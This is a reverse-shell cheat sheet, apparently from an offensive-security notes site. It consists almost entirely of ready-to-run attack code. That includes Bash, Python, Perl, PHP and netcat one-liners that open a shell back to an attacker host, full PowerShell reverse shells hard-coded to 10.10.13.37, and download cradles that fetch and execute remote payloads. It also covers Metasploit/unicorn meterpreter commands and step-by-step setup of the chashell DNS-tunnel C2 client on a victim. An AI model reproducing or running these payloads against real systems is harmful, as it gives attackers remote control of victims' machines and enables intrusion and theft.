Reverse Shells

/bin/bash -c '/bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);s.close()
import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv("HISTFILE","/dev/null");pty.spawn("/bin/bash");s.close()

import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);s.close()
import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv("HISTFILE","/dev/null");pty.spawn("/bin/bash");s.close()

$client = New-Object System.Net.Sockets.TCPClient("10.10.13.37",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
$socket = new-object System.Net.Sockets.TcpClient("10.10.13.37",1337);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;
$res = ""
while($stream.DataAvailable -or $read -eq $null) {
$read = $stream.Read($buffer, 0, 1024)
}
$out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
if(!$out.equals("exit")){
$args = "";
if($out.IndexOf(' ') -gt -1){
$args = $out.substring($out.IndexOf(' ')+1);
$out = $out.substring(0,$out.IndexOf(' '));
if($args.split(' ').length -gt 1){
$pinfo = New-Object System.Diagnostics.ProcessStartInfo
$pinfo.FileName = "cmd.exe"
$pinfo.RedirectStandardError = $true
$pinfo.RedirectStandardOutput = $true
$pinfo.UseShellExecute = $false
$pinfo.Arguments = "/c $out $args"
$p = New-Object System.Diagnostics.Process
$p.StartInfo = $pinfo
$p.Start() | Out-Null
$p.WaitForExit()
$stdout = $p.StandardOutput.ReadToEnd()
$stderr = $p.StandardError.ReadToEnd()
if ($p.ExitCode -ne 0) {
$res = $stderr
} else {
$res = $stdout
}
}
else{
$res = (&"$out" "$args") | out-string;
}
}
else{
$res = (&"$out") | out-string;
}
if($res -ne $null){
$writer.WriteLine($res)
}
}
}While (!$out.equals("exit"))
$writer.close();
$socket.close();
$stream.Dispose()
#$a=New-Object System.Net.Sockets.TcpClient("10.10.13.37",1337);if($a -eq $null){exit 1}$b=$a.GetStream();$c=New-Object System.IO.StreamWriter($b);$d=New-Object System.Byte[] 1024;$e=New-Object System.Text.AsciiEncoding;do{$c.Flush();$f=$null;$g="";while($b.DataAvailable -or $f -eq $null) {$f=$b.Read($d,0,1024)}$h=$e.GetString($d,0,$f).Replace("`r`n","").Replace("`n","");if(!$h.equals("exit")){$i="";if($h.IndexOf(" ") -gt -1){$i=$h.Substring($h.IndexOf(" ")+1);$h=$h.Substring(0,$h.IndexOf(" "));if($i.Split(" ").Length -gt 1){$k=New-Object System.Diagnostics.ProcessStartInfo;$k.FileName="cmd.exe";$k.RedirectStandardError=$true;$k.RedirectStandardOutput=$true;$k.UseShellExecute=$false;$k.Arguments="/c $h $i";$p=New-Object System.Diagnostics.Process;$p.StartInfo=$k;$p.Start()|Out-Null;$p.WaitForExit();$l=$p.StandardOutput.ReadToEnd();$m=$p.StandardError.ReadToEnd();if($p.ExitCode -ne 0){$g=$m}else{$g=$l}}else{$g=(&"$h" "$i")|Out-String;}}else{$g=(&"$h")|Out-String;}if($g -ne $null){$c.WriteLine($g)}}}while(!$h.equals("exit"))$c.close();$a.close();$b.Dispose()

'powershell $a=""""http://10.10.13.37/payload.txt"""";iex(Resolve-DnsName """"cradle.megacorp.com"""" 16).Strings[0]'

<?php echo passthru("/bin/bash -c '/bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'"); ?>

use Socket;$i="<LHOST>";$p=<LPORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};

$ {nc.tradentional|nc|ncat|netcat} <LHOST> <LPORT> {-e|-c} /bin/bash

$ python3 unicorn.py windows/meterpreter/reverse_https 10.10.13.37 443
$ sudo msfconsole -qr unicorn.rc
PS > IEX(New-Object Net.WebClient).DownloadString('powershell_attack.txt')

$ {nc.tradentional|nc|ncat|netcat} [-6] -lvnp <LPORT>

Buy and configure DNS (e.g., c2cdomain.net):
A * -> <IP>
A @ -> <IP>
A chashell -> <IP>
NS c -> chashell.c2cdomain.net
Get dependencies:
$ export GOPATH=/home/snovvcrash/code/go
$ export PATH=$GOPATH:$GOPATH/bin:$PATH
$ go get -v -u github.com/golang/dep/cmd/dep
$ go get github.com/mitchellh/gox
$ cd $GOPATH/src/github.com/golang/dep
$ go install ./...
Clone chashell into $GOPATH/src (otherwise, dep will error out):
$ git clone https://github.com/sysdream/chashell $GOPATH/src/chashell
$ cd $GOPATH/src/chashell
Build binaries:
$ export ENCRYPTION_KEY=$(python -c 'from os import urandom; print(urandom(32).encode("hex"))')
$ export DOMAIN_NAME=c.c2cdomain.net
$ make build-all OSARCH="linux/amd64"
Run server on Attacker:
$ cd release/
$ sudo systemctl stop systemd-resolved
$ sudo ./chaserv_linux_amd64
Run client on Victim:
$ ./chashell_linux_amd64

Listen:
$ rlwrap ./xc -l -p 443
Launch:
PS > Start-Process -NoNewWindow .\xc.exe "10.10.13.38 443"
Copy link
On this page
Bash
Python
IPv4
IPv6
PowerShell
Download Cradles
PowerShell DNS Delivery
PHP
Perl
C
Netcat
Meterpreter
unicorn
Listeners
Transport over DNS
dnscat2
chashell
Tools
VbRev
xc